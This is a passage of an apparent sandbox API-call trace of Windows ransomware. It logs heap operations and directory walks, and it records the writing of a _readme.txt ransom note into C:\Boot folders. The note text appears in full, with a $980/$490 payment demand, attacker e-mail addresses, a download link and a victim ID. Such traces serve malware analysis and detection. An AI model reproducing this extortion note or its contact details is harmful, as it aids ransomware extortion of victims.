0x2ac4ee0 [0184.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.311] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0184.312] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.312] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.312] PathFindFileNameW (pszPath="") returned="" [0184.312] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.312] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.312] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.313] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.313] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0184.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.313] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0184.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.314] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.314] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.314] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.315] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*" (normalized: "c:\\boot\\sv-se\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.316] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.316] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.316] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0184.316] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.317] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.317] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.318] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.318] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.333] 